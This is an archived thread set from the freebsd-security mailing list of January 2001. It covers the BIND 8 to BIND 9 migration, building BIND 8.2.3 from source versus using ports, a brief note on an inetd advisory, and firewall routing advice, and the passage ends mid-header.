ahead and run > >>bind 9? > > > >I dont think all the features are there yet. At least the last time I > >looked at it, there were some things unimplemented. Also, the > >configuration is not totally compatible. I also found it to be a little > >unpredictable when I tried version 9.0.1. Perhaps its more stable now, > >but I personally would wait another month or so for it to shake out. > > > Here is a good summary from the NANOG list by Greg Wood on some of the > things missing, and some of the things that are different. > > >From: woods@weird.com (Greg A. Woods) > >[ On Monday, January 29, 2001 at 01:36:42 (-0800), Eric A. Hall wrote: ] > > > Subject: Re: sorry to ruin several of your evenings... > > > > > > Somebody asked about an in-place upgrade from BIND 8.x to BIND 9.1.0 > > > (sorry I purged some mails before their time). Just for the sake of > > > readiness, be aware that there are some 8.x options which are unsupported > > > in 9.x. I did an in-place upgrade and had to make a few (mostly > > > insignificant) changes which may be problematic for larger sites. > > > > > > The global config entries I had to remove were: > > > > > > fake-iquery yes > > > multiple-cnames yes > > > rfc2308-type1 yes > > > check-names slave ignore > > > maintain-ixfr-base true > > > >That's just the beginning! :-) > > > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option > >'memstatistics-file' is not yet implemented > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: the default for the > >'auth-nxdomain' option is now 'no' > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option > >'host-statistics' is not yet implemented > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'use-id-pool' is > >obsolete > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'check-names' is > >not implemented > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'os' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'parser' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'load' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'panic' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'packet' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'eventlib' ignored > > > >I don't yet know if "host-statistics" is still necessary to be able to > >see the source of an RR in a dump file, or not, but if so then that'll > >be a road-block in keeping me from using 9.1.0 in production. > > > >I'm also very partial to 'check-names'. I've been happy using the > >following in many locations: > > > > check-names master fail; > > check-names slave fail; > > check-names response fail; > > > > > >Even more critically the old 'ndc' program has been replaced by 'rndc', > >which won't work until you've configured it (/etc/rndc.conf) *and* you > >add "controls" statements to your /etc/named.conf to allow it to > >connect, authenticate, and send commands. There doesn't seem to be a > >default way of setting it up for local-only control. I haven't done > >this yet > > > >Even worse than that the new BIND-9 'named' not only doesn't handle > >signals in the same way as previous versions, but it shuts down instead > >of ignoring SIGINT (which used to generate a dump file, which is why > >I've not yet successfully generated and viewed a dump file to see if the > >source of the RR is recorded in there!). So: > > > > > >WARNING: Anyone with scripts or other programs that use signals > >(i.e. kill(1), or kill(2)) to control their named process will almost > >certainly have to re-code to work with BIND-9 (and use 'rndc' and/or its > >mechanisms)! > > > > > >You'll also find that the new named-checkconf fails if you use: > > > > options { > > directory "/etc/namedb"; > > }; > > > >and then try to do something like: > > > > include "named-rfc1918.conf"; > > include "named-slave.conf"; > > include "named-master.conf"; > > > >However the named process itself does seem to do the > >chdir("/etc/namedb") before trying to do the "include"s, > >and if you start named-checkconf from within the right > >directory it'll work.... > > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Network Administration, mike@sentex.net > Sentex Communications www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Marius Strom Professional Geek/Unix System Administrator URL: http://www.marius.org/ http://www.marius.org/marius.pgp 0x55DE53E4 "Never underestimate the bandwidth of a mini-van full of DLT tapes traveling down the highway at 65 miles per hour..." -Andrew Tanenbaum, "Computer Networks" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 20:47:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id A58F937B402 for ; Mon, 29 Jan 2001 20:47:20 -0800 (PST) Received: from fpsn.net (control.fpsn.net [63.224.69.60]) by mail.fpsn.net (8.9.3/8.9.3) with ESMTP id VAA98074; Mon, 29 Jan 2001 21:47:07 -0700 (MST) (envelope-from cfaber@fpsn.net) Message-ID: <3A764723.DCF37DD2@fpsn.net> Date: Mon, 29 Jan 2001 21:46:27 -0700 From: Colin Faber Reply-To: cfaber@fpsn.net Organization: fpsn.net, Inc. X-Mailer: Mozilla 4.75 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Marius Strom Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: BIND9 Migration from BIND8 (Was: BIND 8.2.3 upgrade available) References: <006901c08a45$30d64860$46010a0a@sysadmininc.com> <20010129143300.A38419@xor.obsecurity.org> <4.2.2.20010129175758.03255570@marble.sentex.net> <4.2.2.20010129221351.03331388@marble.sentex.net> <20010129223943.L388@marius.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks. Marius Strom wrote: > I've posted the migration text file out of the bind-9.1.0 package at > http://www.marius.org/~marius/unix/migration should anyone care for > ISC's full details without downloading the full archive. > > On Mon, Jan 29, 2001 at 10:15:28PM -0500, Mike Tancsa wrote: > > At 06:00 PM 1/29/2001 -0500, Mike Tancsa wrote: > > >At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote: > > >>Is there a big reason why anyone would not want to just go ahead and run > > >>bind 9? > > > > > >I dont think all the features are there yet. At least the last time I > > >looked at it, there were some things unimplemented. Also, the > > >configuration is not totally compatible. I also found it to be a little > > >unpredictable when I tried version 9.0.1. Perhaps its more stable now, > > >but I personally would wait another month or so for it to shake out. > > > > > > Here is a good summary from the NANOG list by Greg Wood on some of the > > things missing, and some of the things that are different. > > > > >From: woods@weird.com (Greg A. Woods) > > >[ On Monday, January 29, 2001 at 01:36:42 (-0800), Eric A. Hall wrote: ] > > > > Subject: Re: sorry to ruin several of your evenings... > > > > > > > > Somebody asked about an in-place upgrade from BIND 8.x to BIND 9.1.0 > > > > (sorry I purged some mails before their time). Just for the sake of > > > > readiness, be aware that there are some 8.x options which are unsupported > > > > in 9.x. I did an in-place upgrade and had to make a few (mostly > > > > insignificant) changes which may be problematic for larger sites. > > > > > > > > The global config entries I had to remove were: > > > > > > > > fake-iquery yes > > > > multiple-cnames yes > > > > rfc2308-type1 yes > > > > check-names slave ignore > > > > maintain-ixfr-base true > > > > > >That's just the beginning! :-) > > > > > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option > > >'memstatistics-file' is not yet implemented > > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: the default for the > > >'auth-nxdomain' option is now 'no' > > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option > > >'host-statistics' is not yet implemented > > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'use-id-pool' is > > >obsolete > > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'check-names' is > > >not implemented > > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > > >category 'os' ignored > > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > > >category 'parser' ignored > > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > > >category 'load' ignored > > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > > >category 'panic' ignored > > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > > >category 'packet' ignored > > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > > >category 'eventlib' ignored > > > > > >I don't yet know if "host-statistics" is still necessary to be able to > > >see the source of an RR in a dump file, or not, but if so then that'll > > >be a road-block in keeping me from using 9.1.0 in production. > > > > > >I'm also very partial to 'check-names'. I've been happy using the > > >following in many locations: > > > > > > check-names master fail; > > > check-names slave fail; > > > check-names response fail; > > > > > > > > >Even more critically the old 'ndc' program has been replaced by 'rndc', > > >which won't work until you've configured it (/etc/rndc.conf) *and* you > > >add "controls" statements to your /etc/named.conf to allow it to > > >connect, authenticate, and send commands. There doesn't seem to be a > > >default way of setting it up for local-only control. I haven't done > > >this yet > > > > > >Even worse than that the new BIND-9 'named' not only doesn't handle > > >signals in the same way as previous versions, but it shuts down instead > > >of ignoring SIGINT (which used to generate a dump file, which is why > > >I've not yet successfully generated and viewed a dump file to see if the > > >source of the RR is recorded in there!). So: > > > > > > > > >WARNING: Anyone with scripts or other programs that use signals > > >(i.e. kill(1), or kill(2)) to control their named process will almost > > >certainly have to re-code to work with BIND-9 (and use 'rndc' and/or its > > >mechanisms)! > > > > > > > > >You'll also find that the new named-checkconf fails if you use: > > > > > > options { > > > directory "/etc/namedb"; > > > }; > > > > > >and then try to do something like: > > > > > > include "named-rfc1918.conf"; > > > include "named-slave.conf"; > > > include "named-master.conf"; > > > > > >However the named process itself does seem to do the > > >chdir("/etc/namedb") before trying to do the "include"s, > > >and if you start named-checkconf from within the right > > >directory it'll work.... > > > > -------------------------------------------------------------------- > > Mike Tancsa, tel +1 519 651 3400 > > Network Administration, mike@sentex.net > > Sentex Communications www.sentex.net > > Cambridge, Ontario Canada www.sentex.net/mike > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > Marius Strom > Professional Geek/Unix System Administrator > URL: http://www.marius.org/ > http://www.marius.org/marius.pgp 0x55DE53E4 > > "Never underestimate the bandwidth of a mini-van full of DLT > tapes traveling down the highway at 65 miles per hour..." > -Andrew Tanenbaum, "Computer Networks" > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 20:49:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from marius.org (marius.org [216.88.115.170]) by hub.freebsd.org (Postfix) with ESMTP id 3C30537B402 for ; Mon, 29 Jan 2001 20:48:53 -0800 (PST) Received: (from marius@localhost) by marius.org (8.11.0/8.11.0) id f0U4moX15272; Mon, 29 Jan 2001 22:48:50 -0600 (CST) Date: Mon, 29 Jan 2001 22:48:50 -0600 From: Marius Strom To: Richard Ward Cc: freebsd-security@freebsd.org Subject: Re: BIND 9.1 woes Message-ID: <20010129224850.M388@marius.org> Mail-Followup-To: Richard Ward , freebsd-security@freebsd.org References: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion>; from mh@neonsky.net on Mon, Jan 29, 2001 at 09:43:03PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to bind-9.1.0/README: On FreeBSD systems, the server logs error messages like "fcntl(8, F_SETFL, 4): Inappropriate ioctl for device". This is due to a bug in the FreeBSD /dev/random device. The bug has been reported to the FreeBSD maintainers. Versions of OpenBSD prior to 2.8 have a similar problem. As far as your -g question, it seems -g support has been deprecated, although I can't find any confirmation of this in BIND9 docs. The new functionality of -g is to (according to the new manpage): -g run named in the foreground and force all logging to stderr. On Mon, Jan 29, 2001 at 09:43:03PM -0500, Richard Ward wrote: > I just downloaded the BIND 9.1 tarball after hearing about the chaos with previous versions. I did run into something odd that I can't quite figure out, it's also mentioned in the 9.1 documentation and I'm sure some one knows the answer. I managed to start BIND fine, yet digging through the logs I ran into this line that makes me wonder. > > entropy.c:948: unexpected error: > fcntl(8, F_SETFL, 4): Inappropriate ioctl for device > > Could some one shed light on this "problem"? Also, when trying to start BIND 9.1, it will start fine as 'named -g', though when I try to 'named -u bind -g bind' (so it runs as that user/group) it doesn't launch to the background, and fails to start period. Any ideas? (Sorry for all the questions, I just moved from 8.X and am still getting used to the changes/features) > > Thanks. > Richard Ward > mh@maKintosh.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Marius Strom Professional Geek/Unix System Administrator URL: http://www.marius.org/ http://www.marius.org/marius.pgp 0x55DE53E4 "Never underestimate the bandwidth of a mini-van full of DLT tapes traveling down the highway at 65 miles per hour..." -Andrew Tanenbaum, "Computer Networks" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 21:32:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id B212737B400 for ; Mon, 29 Jan 2001 21:32:18 -0800 (PST) Received: from localhost (marquis@localhost) by roble.com with ESMTP id f0U5WIb01177 for ; Mon, 29 Jan 2001 21:32:18 -0800 (PST) Date: Mon, 29 Jan 2001 21:32:18 -0800 (PST) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mehmet Hinc wrote: > Stop in /usr/ports/net/bind8. > *** Error code 1 > > What ??????????? Why??????????? I updated my ports and tried to install > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was > installing it, I had a error msgs. (in the up) > please let me know How can I fix it !!! Bind was written on BSD. What's the point of using a port to upgrade it? All FreeBSD's bind port does is increase your chances of errors, reduce your system's overall QA, and install duplicate files in non-standard places. The following steps have worked flawlessly over this and several bind upgrades: cd /tmp fetch ftp.isc.org/isc/bind/src/8.2.3/bind-src.tar.gz tar xzvf bind-src.tar.gz cd src make install killall named named ps auxww | grep named cd /tmp rm -rf src bind-src.tar.gz -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 21:46:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 2A34F37B400 for ; Mon, 29 Jan 2001 21:46:04 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1098) id 4622D2B5C4; Mon, 29 Jan 2001 23:46:03 -0600 (CST) Date: Mon, 29 Jan 2001 23:46:03 -0600 From: Bill Fumerola To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010129234603.U57121@elvis.mu.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800 X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote: > Bind was written on BSD. What's the point of using a port to > upgrade it? All FreeBSD's bind port does is increase your chances > of errors, reduce your system's overall QA, and install duplicate > files in non-standard places. The following steps have worked > flawlessly over this and several bind upgrades: You seem to have missed a major benefit of (the possibly confusingly named) ports system: How do you uninstall all the files it just installed in your method? How do you know what version is currently installed? The ports tree is more then just "ported software", its a package management system. -- Bill Fumerola - security yahoo / Yahoo! inc. - fumerola@yahoo-inc.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 21:52:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id F18E437B402 for ; Mon, 29 Jan 2001 21:52:11 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id ADE59BA134; Mon, 29 Jan 2001 21:52:41 -0800 (PST) Date: Mon, 29 Jan 2001 21:52:41 -0800 From: Kris Kennaway To: Roger Marquis Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010129215241.A67997@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="W/nzBZO5zC0uMSeA" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --W/nzBZO5zC0uMSeA Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote: > Mehmet Hinc wrote: > > Stop in /usr/ports/net/bind8. > > *** Error code 1 > >=20 > > What ??????????? Why??????????? I updated my ports and tried to install > > bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was > > installing it, I had a error msgs. (in the up) > > please let me know How can I fix it !!! >=20 > Bind was written on BSD. What's the point of using a port to > upgrade it? All FreeBSD's bind port does is increase your chances > of errors, reduce your system's overall QA, and install duplicate > files in non-standard places. The following steps have worked > flawlessly over this and several bind upgrades: Surely that's the description of what your version does, not the port, which is an official, reversible, tested, vetted way to install the software on FreeBSD. In other words, when you compile software yourself you "void the warranty" and take your life into your own hands :-) Kris --W/nzBZO5zC0uMSeA Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dlapWry0BWjoQKURAuAjAKDngM/hWjoyCjyHks2YfncMwcv0IwCg+gKi 4NsvCDiMg3+czlkqLxdwAMo= =krCm -----END PGP SIGNATURE----- --W/nzBZO5zC0uMSeA-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 21:55:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 443C237B400 for ; Mon, 29 Jan 2001 21:55:36 -0800 (PST) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id AAA30035; Tue, 30 Jan 2001 00:55:11 -0500 Date: Tue, 30 Jan 2001 00:55:10 -0500 (EST) From: Mikhail Kruk To: Kris Kennaway Cc: Roger Marquis , Subject: Re: bind8.2.3 and installation problem In-Reply-To: <20010129215241.A67997@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > In other words, when you compile software yourself you "void the > warranty" and take your life into your own hands :-) Oh, so there is a warranty after all? I knew /COPYRIGHT was a joke! ;) > > Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 22: 0: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 0806637B404 for ; Mon, 29 Jan 2001 21:59:49 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id EDA57BA134; Mon, 29 Jan 2001 22:00:18 -0800 (PST) Date: Mon, 29 Jan 2001 22:00:18 -0800 From: Kris Kennaway To: Mikhail Kruk Cc: Roger Marquis , security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010129220018.B74106@xor.obsecurity.org> References: <20010129215241.A67997@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="AqsLC8rIMeq19msA" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from meshko@cs.brandeis.edu on Tue, Jan 30, 2001 at 12:55:10AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --AqsLC8rIMeq19msA Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 12:55:10AM -0500, Mikhail Kruk wrote: > > In other words, when you compile software yourself you "void the > > warranty" and take your life into your own hands :-) >=20 > Oh, so there is a warranty after all? I knew /COPYRIGHT was a joke! ;) Well, no, but it's still more of a warranty than you get doing it on your own :-) Kris --AqsLC8rIMeq19msA Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dlhyWry0BWjoQKURArSsAKCHyT07Bph3nP4eQkH3QE09N2FVYQCg+TlB c18IuPLgWr9g60KDR7lrCwk= =oMIx -----END PGP SIGNATURE----- --AqsLC8rIMeq19msA-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 22:11:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id B4A9A37B698 for ; Mon, 29 Jan 2001 22:10:39 -0800 (PST) Received: from localhost (7h1k9s@localhost [127.0.0.1]) by green.dyndns.org (8.11.1/8.11.1) with ESMTP id f0U69Cf70017 for ; Tue, 30 Jan 2001 01:09:48 -0500 (EST) (envelope-from green@FreeBSD.org) Message-Id: <200101300609.f0U69Cf70017@green.dyndns.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 X-Exmh-Isig-CompType: repl X-Exmh-Isig-Folder: security To: security@FreeBSD.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED] In-Reply-To: Message from FreeBSD Security Advisories of "Mon, 29 Jan 2001 13:06:31 PST." <20010129210631.015E137B698@hub.freebsd.org> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain Date: Tue, 30 Jan 2001 01:09:11 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, there were two issues. One was that the permissions weren't dropped totally on the way to opening the .fakeid file, and the other was that it was not read in a way that would be guaranteed not to block, so by creating a named pipe, the user could hang an inetd child. I don't remember which was reported and which I discovered as a result of fixing the other, BTW. The advisory really should incorporate at least both issues... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 22:28:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 3B66A37B402; Mon, 29 Jan 2001 22:28:35 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id B7E8FBA134; Mon, 29 Jan 2001 22:29:04 -0800 (PST) Date: Mon, 29 Jan 2001 22:29:03 -0800 From: Kris Kennaway To: "Brian F. Feldman" Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED] Message-ID: <20010129222903.A79869@xor.obsecurity.org> References: <200101300609.f0U69Cf70017@green.dyndns.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NzB8fVQJ5HfG6fxh" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101300609.f0U69Cf70017@green.dyndns.org>; from green@FreeBSD.ORG on Tue, Jan 30, 2001 at 01:09:11AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --NzB8fVQJ5HfG6fxh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 01:09:11AM -0500, Brian F. Feldman wrote: > Actually, there were two issues. One was that the permissions weren't=20 > dropped totally on the way to opening the .fakeid file, and the other was= =20 > that it was not read in a way that would be guaranteed not to block, so b= y=20 > creating a named pipe, the user could hang an inetd child. Is that really a security issue, though? Kris --NzB8fVQJ5HfG6fxh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dl8vWry0BWjoQKURAu8UAKDO1CwB7FLOqY+fQwcQArE33M4UzgCeJ6hA FNGsS/SECT82Mt1pWbuMyaU= =XvgO -----END PGP SIGNATURE----- --NzB8fVQJ5HfG6fxh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 22:46:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id B65F437B400 for ; Mon, 29 Jan 2001 22:46:32 -0800 (PST) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Mon, 29 Jan 2001 22:44:11 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0U6jsP02016; Mon, 29 Jan 2001 22:45:54 -0800 (PST) (envelope-from cjc) Date: Mon, 29 Jan 2001 22:45:48 -0800 From: "Crist J. Clark" To: mharding@marketnews.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: My FreeBSD Firewall Message-ID: <20010129224547.E91447@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <980823114.3a762c4a041fa@mail.marketnews.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <980823114.3a762c4a041fa@mail.marketnews.com>; from mharding@marketnews.com on Mon, Jan 29, 2001 at 09:51:54PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 29, 2001 at 09:51:54PM -0500, mharding@marketnews.com wrote: > Hello. I am building a Firewall and have some questions about how to implement > it. The basic firewall is a FreeBSD box running squid for transparent proxy, > IPFW for dummynet to rate limit syn's, and IPF as my main statefull packet > filter. The problem I have is with putting this into production. I have a T1 > to the internet, the routers IP address is 172.16.1.1(well not really but it > works for the example) and all of the computers on the LAN are in the 172.16.1.0 > (once again..only for the example) network. So here I get to the > question....is there any way to set the firewall with the same IP address as > the router to make the install fairly transparent to the users? Could I set > the firewall up as 172.16.1.1 and use NAT to let it communicate with the router > for internet traffic? How would I set up my routing tables? Also if anyone > has any input as far as how I am building my firewall that would be very > appreciated. Easy. Put a RFC1918 LAN in between the router and firewall, { Router:192.168.100.1---192.168.100.2:Firewall:172.16.1.1---{ 172.16.1.0/xx { Just change the internal address of the router and add the route (in route(8) syntax), route add net 172.16.1.0/xx 192.168.100.2 No need for NAT or anything wack like that. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 22:52:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 367BC37B402; Mon, 29 Jan 2001 22:51:59 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0U6pvq16959; Mon, 29 Jan 2001 22:51:57 -0800 (PST) Date: Mon, 29 Jan 2001 22:51:57 -0800 From: Alfred Perlstein To: Kris Kennaway Cc: "Brian F. Feldman" , security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED] Message-ID: <20010129225157.O26076@fw.wintelcom.net> References: <200101300609.f0U69Cf70017@green.dyndns.org> <20010129222903.A79869@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010129222903.A79869@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Jan 29, 2001 at 10:29:03PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Kris Kennaway [010129 22:28] wrote: > On Tue, Jan 30, 2001 at 01:09:11AM -0500, Brian F. Feldman wrote: > > Actually, there were two issues. One was that the permissions weren't > > dropped totally on the way to opening the .fakeid file, and the other was > > that it was not read in a way that would be guaranteed not to block, so by > > creating a named pipe, the user could hang an inetd child. > > Is that really a security issue, though? Just a guess, one could slowly eat away at all available proccess slots. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 22:59:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id E322137B503 for ; Mon, 29 Jan 2001 22:59:11 -0800 (PST) Received: from 